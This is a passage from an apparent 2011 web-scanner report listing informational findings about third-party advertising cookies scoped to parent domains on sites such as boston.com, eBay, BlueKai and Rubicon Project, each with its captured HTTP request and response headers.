P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lByB_/)J710+(4l>TXOa/.Birq1fq-X1ERjb@jz/SQr@WW]eUJ-OE*1#UHg*y%yOLtrDh-C4!Hli5a!`H2^lxIri!1F8u-S'01a-)<.7^F*rx5H4abfMh8ka_c$rXGuAnkCQhvg(eH>ow9.x?t0KJTEJbtcX^90n-JKj)^q-:`?.Q^cx-#SPiA)Xvm<4-KK3*yAdiR?e3@*x6kRX0IipL$d9hb'5B).jNM(-0gRpoyYWA:OpD@yyRKmgsn2IT*8)ndMM#)ulobbjOQ[2x/si'Oj2dh]?Rfs-b1cH+3z?T2j4wh!H'UucnRj1hcD_i0_vk7v`xHvikYsgmE/Fnn.rp+SOt#=IA`bM]+`?1TG^@6E.<eb8<327x<r9r$nc`9jV1oH!Ecm%'+9AA0fIOIil@mkb0ClZAW(Sb9Ap%Wd-/j6y[!k)AQq_):^`Ru22I]KSNT1C+yO(Zhq67RVPrPp108OQNoMbkQ5%%IO)H^Xo:ZWT=9DHt8?JX[MBc.='TK#t[zgSwT%0AAS9ksGdUbRBu[L2fVttAEImIc0kL6(5GCL.-^IVfqMi*(#U2Rj`.VK0DFzHnR-ao7Enah'MdsB.Cj!e$1sY_6/o7O(PN:cvbi9uYTTpwSQ#ecxe?Yn2rWdm*='f$1ZusKKmC4f5>^)ma(vor3?sbu[5VvqNbgC)$m$F1+x%%1$u-rqb]$/hZbv'fVWGPkWCSQ$U`:/q'F[-kQuU:ZcqgBD2XC8T8p=`2x9ftcpHl/@6Zg5Xbt-q^wwx1e`%M<aT; path=/; expires=Mon, 17-Oct-2011 18:36:05 GMT; domain=.adnxs.com; HttpOnly
Location: http://matcher.bidder7.mookie1.com/zap?aid=10000212&sid=223
Date: Tue, 19 Jul 2011 18:36:05 GMT
Content-Length: 0

13.108. http://sitelife.boston.com/ver1.0/Direct/Jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 838
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:43:58 GMT

RequestBatch.callbacks.daapiCallback0({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/19/2011 04:42:04:603 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"b12c8144-b20e-11e0-aa83-a
...[SNIP]...

13.109. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&plckUserId=null&plckGcid=daapiCall&plckCurrentTime=1311108242646 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-2; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Business%20%7C%20Blog%20%7C%20Business%20Ticker%20Weblog%20%7C%20State%20Street%20announces%20more%20job%20cuts%20; s_sq=%5B%5BB%5D%5D; s_ppv=0; SiteLifeHost=l3vm104l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:44:37 GMT

13.110. http://srx.main.ebayrtm.com/rtm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srx.main.ebayrtm.com
Path:	/rtm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A01=ABQAsMSUOAAAAAAAA5QuZsFGR1aCzORA; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
M01=AAAACOACQgAE; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
TC01=QBIPKvOUMBAAAEALjElDAAAAAAAQGAAABPkbGAktwIAS1aCQmdiAI; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
RUA=D1AQAAATErF7ITAAYZchzOJQkAi5g%2BSQv3HKquZ2UrSVcKqhXgTu2GgiVmuErKwnKU3EYCaSfQGfK4sdpUu7I77It5rkG%2FanWo9FEvGie%2FiCjYBRuz%2Bu%2BZVv%2BrRQ6jwbWnCXh61dKhTowAEb5BjV%2B5KPdxZawyqSMM9g7Pi697Ovt5X8I8Ko%2Ffi7lhEUATgXz%2F%2Bm47HrMTGxCPDyF%2F3CYZ; Domain=main.ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
RUP=D1AQAAATErF7ITAAZS1xanS0Gk9aSM%2BmfKsGDaavNO5bWn4V4sSMYKOyEr1u1UDyQ*; Domain=ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
HT=1311100529004%02433%04165364%06142708%03829%04-1%060%03827%04-1%060%03825%04174461%06154106%03699%04-1%060%031595%04184241%06144661%03912%04-1%060%03974%04-1%060%03973%04187759%06167625%03876%04-1%060%031651%04-1%060%03813%04-1%060%031650%04-1%060%03283%04153923%0699446%03280%04153917%0699446; Domain=main.ebayrtm.com; Path=/rtm

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtm?RtmCmd&a=json&p=699:1595:973:974:825:827:829:813:283:280:433:876:912:1650:1651&ph=0:0:0:0:0:0:0:0:0:0:0:0:0:0:0&ev=0:0:0:0:0:0:0:0:0:1:0:0:0:0:0&g=adb7b0cb1300a0aa15432be3fe5c7984&uf=0&c=1H4sIAAAAAAAAAFVU32vbMBB%2BL%2FR%2FMGxPQ011OkmWAnoobQctNA1N1m0QMG6itqaNHWxnWSB%2F%2FE6Sl25Pd9%2F9%2BHT%2BTvKn%2BdZnt9v3DGwGMEY1Fia7m80zwQFOTzbC5o4Hy8FFzLn7JjLUPJs32zYT2bxavvm%2Byzq%2FRKmyid9lt77t%2FD777leBev%2FBpRxYNFyaSIngnqr6ZfRc1l1dbkbLZk1hQONAgxDRzx0gV8G11oHgubRWciF5zGKcCVA4xUcplMYELeLYYOWRQA8pC27my66p%2F47O2Mwv%2B6qpGX0Am2zXT77NmudjWrC7pu5fWfgWdv3L13022z71%2B41nD83y7XzabM4v3nvf1qMhPQ%2B5y6Ze%2Bpb6H31NIs%2F6svfn07b5VVGcfeg05C%2BrntjLrs8etv2rb5%2BbdsV%2B%2BrJlQT52Ve7JoQN3jFBqmZTrRHTny1Wzey%2FrVRfOWVXboCSa3LXrt%2FvyovtyerKsViTgYss50fFk1f8wqCNsUknlztqRtTEmj50xhUlbg05i3ASCoepUbMSwlGgQ8gTTPhB0gnBkR5Du682P66ti%2BnBzeR0jOBQTFQGRGzCaTg%2BXBpSjO8jTugVVfiZVIo6BXMVWyYerkRs3rDHNP%2Bzn31Aok9LF4an9ePckuGCRGycj5gOmmsVYkSqmOCPpxsAl58UZklcAF3oxFgWAJot5CMjFWHJyOLVZsjoPPYVQCqlHSgNQWC2USUAUEnMRedHayKuxEKgCozTK5DEWvJQlIg3k0XBmGBHd%2FcbXi6hBUhzp4U7LF%2F9Y%2Bd1N79cT%2F7sPgjkj0%2Fs2wzv%2F2Ds%2FaiG0daS1YsAkMGFRMuTCMG2ZHrCyTMXS%2BE6VgvxgDVdGHuj6WmPNAZUAjfYguVZc5JE2H34q6XYIlM7EuA74DxaR6JCcBAAA&ord=1311100529004&e=USC:1&z=10&bw=1065&bh=723&cg=3666b2e01300a47a44d622a6ffc19372&enc=UTF-8&v=4&rnc=1&cb=vjo.dsf.assembly.VjClientAssembler._callback0&_vrdm=1311100538345 HTTP/1.1
Host: srx.main.ebayrtm.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4pphdlwc%3D9u%7E*t%28750d%7F2%3B-13143af2894-0x16f
Cache-Control: no-cache
Expires: 0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: A01=ABQAsMSUOAAAAAAAA5QuZsFGR1aCzORA; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: M01=AAAACOACQgAE; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: TC01=QBIPKvOUMBAAAEALjElDAAAAAAAQGAAABPkbGAktwIAS1aCQmdiAI; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: RUA=D1AQAAATErF7ITAAYZchzOJQkAi5g%2BSQv3HKquZ2UrSVcKqhXgTu2GgiVmuErKwnKU3EYCaSfQGfK4sdpUu7I77It5rkG%2FanWo9FEvGie%2FiCjYBRuz%2Bu%2BZVv%2BrRQ6jwbWnCXh61dKhTowAEb5BjV%2B5KPdxZawyqSMM9g7Pi697Ovt5X8I8Ko%2Ffi7lhEUATgXz%2F%2Bm47HrMTGxCPDyF%2F3CYZ; Domain=main.ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: RUP=D1AQAAATErF7ITAAZS1xanS0Gk9aSM%2BmfKsGDaavNO5bWn4V4sSMYKOyEr1u1UDyQ*; Domain=ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: HT=1311100529004%02433%04165364%06142708%03829%04-1%060%03827%04-1%060%03825%04174461%06154106%03699%04-1%060%031595%04184241%06144661%03912%04-1%060%03974%04-1%060%03973%04187759%06167625%03876%04-1%060%031651%04-1%060%03813%04-1%060%031650%04-1%060%03283%04153923%0699446%03280%04153917%0699446; Domain=main.ebayrtm.com; Path=/rtm
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 72197
Date: Tue, 19 Jul 2011 18:36:17 GMT

try{vjo.dsf.assembly.VjClientAssembler._callback0([
{"id":"1595","mid":"184241","iid":"1457744126094707453","type":"html","width":"-1","height":"-1","content":"<body>\n <div class=\"pi\">\n<div cl
...[SNIP]...

13.111. https://ssl.bing.com/travel/secure/account/overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl.bing.com
Path:	/travel/secure/account/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=2&TS=1311118711; domain=.bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.112. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=DLpRi65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
bkc=KJh56ENn96WxOrOlf686wE2bwfODWvLe6PMjoMCEHR+QsLcvNi/vYoJsnnuJt9AueYoJWSNDNYF2a6v6Wus/i3DpAVWpP06wIXfmfs8iQ1R/zn1NWULGMuqAKL3aywkMWYCVeESrht14jhNcA23zaN5XGJxOfi/qCdCzjq47+P2EwogPwA0jptzwAn74r4DbdEy9fnKVDEboS52V7YdfQVREK1IwAP+Ef/V0BFzEw8O+9oHwqDhw9dqpMeq7hDdAAwnqIXf8EVlmi0IsQmAgQIPN8b29ZdwiTjerIy1L8j0pAEq7hEL2ymXvXJJNnQqSCublSqbeUG1AzFSdGjyn+qkKUvV2EJdOR847DrSXtan2d4cddTgU2gxU5fP8a4XOYOi1jQ==; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101u8XGIGc9W5lOCL=; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=6XdZv65dzaRBvF/1; bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; bko=KJyp8Z5QSB6ibX4/zaZRQuWUpOvsLbf9VuWi1BRABQSsVxLTdUQRfF901BppTFHMRk9aLQTRzyJkWTsLwV9V9sVbWAQ=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrS+YpM2VOQm9rPPsWy1nY61AhmB5RtEpRNNEj/BMcD+eYhu5Pw1eYNEDoBBW+11DtrbxmGF9BVp18EZjK4kkI45Xy/J4x9vYEmRs8LSVHQjsorRsOLRVOQRskQRcM/su4Bp1yYO4yY/fzrBoBLqnBuYvqxDvYEBTmpGsrp3ct7QsrTEkHZuqOHDjHHujHaCSaRSKQOLXYGIOQRKCQecGO9dNbeT6aOwkdO6AniN9JvJeYtz4QeDTpy5; bkw5=KJhgDsHQRmeSh19aoWxjTMDRsOQjmn7tEZ5QIvzaA47c01e9hoeQCoY8oytDARnGWVYRRTixtSvn1WtxTjGHxrRDAGyxyNXAsUj2CsZYe/TZYOAwG1A1cJLREQ9ocQRZqTu13QDeQ8wZJQRNJQRsaGjXn8e1BmRwkQy1ZkYjmvYgmHkvQEJ1xetmeD9KP6Gp96mCa59ypA61UhCO1rctYJ6vxnRph6WsWsOAKsRwA7dnrlLS/8YzrRvHG5tOQuaBRCBeYkMIoxwWBDOMs90z/m8XO3uTsHRCr4mqOXEUa2QjsaQjsJaAOnhOiiW0n9p1ue/wFuabH1eCLx+J8GQdA9NlRUyQi/uTXOvvEY3uMWG9zFhKe6YRhCV/gmzoAofjvevBxxQj9vJBUOx=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015bioI/c9WjcOjX=; bklc=4e25ec55; bkdc=res

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:29 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 20 Jul 2011 20:43:29 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=DLpRi65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlf686wE2bwfODWvLe6PMjoMCEHR+QsLcvNi/vYoJsnnuJt9AueYoJWSNDNYF2a6v6Wus/i3DpAVWpP06wIXfmfs8iQ1R/zn1NWULGMuqAKL3aywkMWYCVeESrht14jhNcA23zaN5XGJxOfi/qCdCzjq47+P2EwogPwA0jptzwAn74r4DbdEy9fnKVDEboS52V7YdfQVREK1IwAP+Ef/V0BFzEw8O+9oHwqDhw9dqpMeq7hDdAAwnqIXf8EVlmi0IsQmAgQIPN8b29ZdwiTjerIy1L8j0pAEq7hEL2ymXvXJJNnQqSCublSqbeUG1AzFSdGjyn+qkKUvV2EJdOR847DrSXtan2d4cddTgU2gxU5fP8a4XOYOi1jQ==; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101u8XGIGc9W5lOCL=; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 20-Jul-2011 20:43:29 GMT; path=/; domain=.bluekai.com
BK-Server: 4a4
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.113. http://tags.bluekai.com/site/450 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/450

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e25ec55; expires=Thu, 21-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
bk=6XdZv65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=HisbCW5dzaRBvF/1; bkc=KJh56g2n9pWDOdOFKiKS7Mdt3MCtWvze6E385MQfPR5iabaEPyzPavunmmCuzHmAvaULDJNDNOF2nyHNWSs/i3wFVjfor0UJCl0EkTEWOZCkQvFNiRisivZ8unMAm2z2RY6cl/xtYFYhpmf1SgXAFeI+FjzyfXXKJnXw9uztCKgkKJuiKrpUjbBXKvo2U5zrBfgtzepvegwSUW2XkQqSqKY+mwjlwdjzEjFpTMr0MRcSA4llT8xt8XDw8/e0spFmhPP+pGrqyXeArzaih47ENISXKYuQ2dAsaQgmIPYqXInBwrO7YUMvm852fPvwmluIlUbemcEtF3OzYnH8FqCOzfAOQdLKp0E1Kqsk2qzcl4XQU+7V7+du8kfXYhy2Cl6=; bko=KJyp8Z5QSB6ibX4/zaZRQuWUpOvsLbf9VuWi1BRABQSsVxLTdUQRfF901BppTFHMRk9aLQTRzyJkWTsLwV9V9sVbWAQ=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrS+YpM2VOQm9rPPsWy1nY61AhmB5RtEpRNNEj/BMcD+eYhu5Pw1eYNEDoBBW+11DtrbxmGF9BVp18EZjK4kkI45Xy/J4x9vYEmRs8LSVHQjsorRsOLRVOQRskQRcM/su4Bp1yYO4yY/fzrBoBLqnBuYvqxDvYEBTmpGsrp3ct7QsrTEkHZuqOHDjHHujHaCSaRSKQOLXYGIOQRKCQecGO9dNbeT6aOwkdO6AniN9JvJeYtz4QeDTpy5; bkw5=KJhgDsHQRmeSh19aoWxjTMDRsOQjmn7tEZ5QIvzaA47c01e9hoeQCoY8oytDARnGWVYRRTixtSvn1WtxTjGHxrRDAGyxyNXAsUj2CsZYe/TZYOAwG1A1cJLREQ9ocQRZqTu13QDeQ8wZJQRNJQRsaGjXn8e1BmRwkQy1ZkYjmvYgmHkvQEJ1xetmeD9KP6Gp96mCa59ypA61UhCO1rctYJ6vxnRph6WsWsOAKsRwA7dnrlLS/8YzrRvHG5tOQuaBRCBeYkMIoxwWBDOMs90z/m8XO3uTsHRCr4mqOXEUa2QjsaQjsJaAOnhOiiW0n9p1ue/wFuabH1eCLx+J8GQdA9NlRUyQi/uTXOvvEY3uMWG9zFhKe6YRhCV/gmzoAofjvevBxxQj9vJBUOx=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015bioI/c9WjcOjX=; bklc=4e242eb4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:01 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e25ec55; expires=Thu, 21-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=6XdZv65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 20-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Wed, 20 Jul 2011 20:43:01 GMT
Cache-Control: max-age=86400, private
BK-Server: a96f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.114. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
lm="19 Jul 2011 20:27:49 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1; cd=false; dq=98|8|90|0; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 204 No Content
Date: Tue, 19 Jul 2011 20:27:49 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
Set-Cookie: dq=100|10|90|0; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
Set-Cookie: xdp_ti="19 Jul 2011 20:27:49 GMT"; Version=1; Max-Age=604800; Path=/
Set-Cookie: lm="19 Jul 2011 20:27:49 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

13.115. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
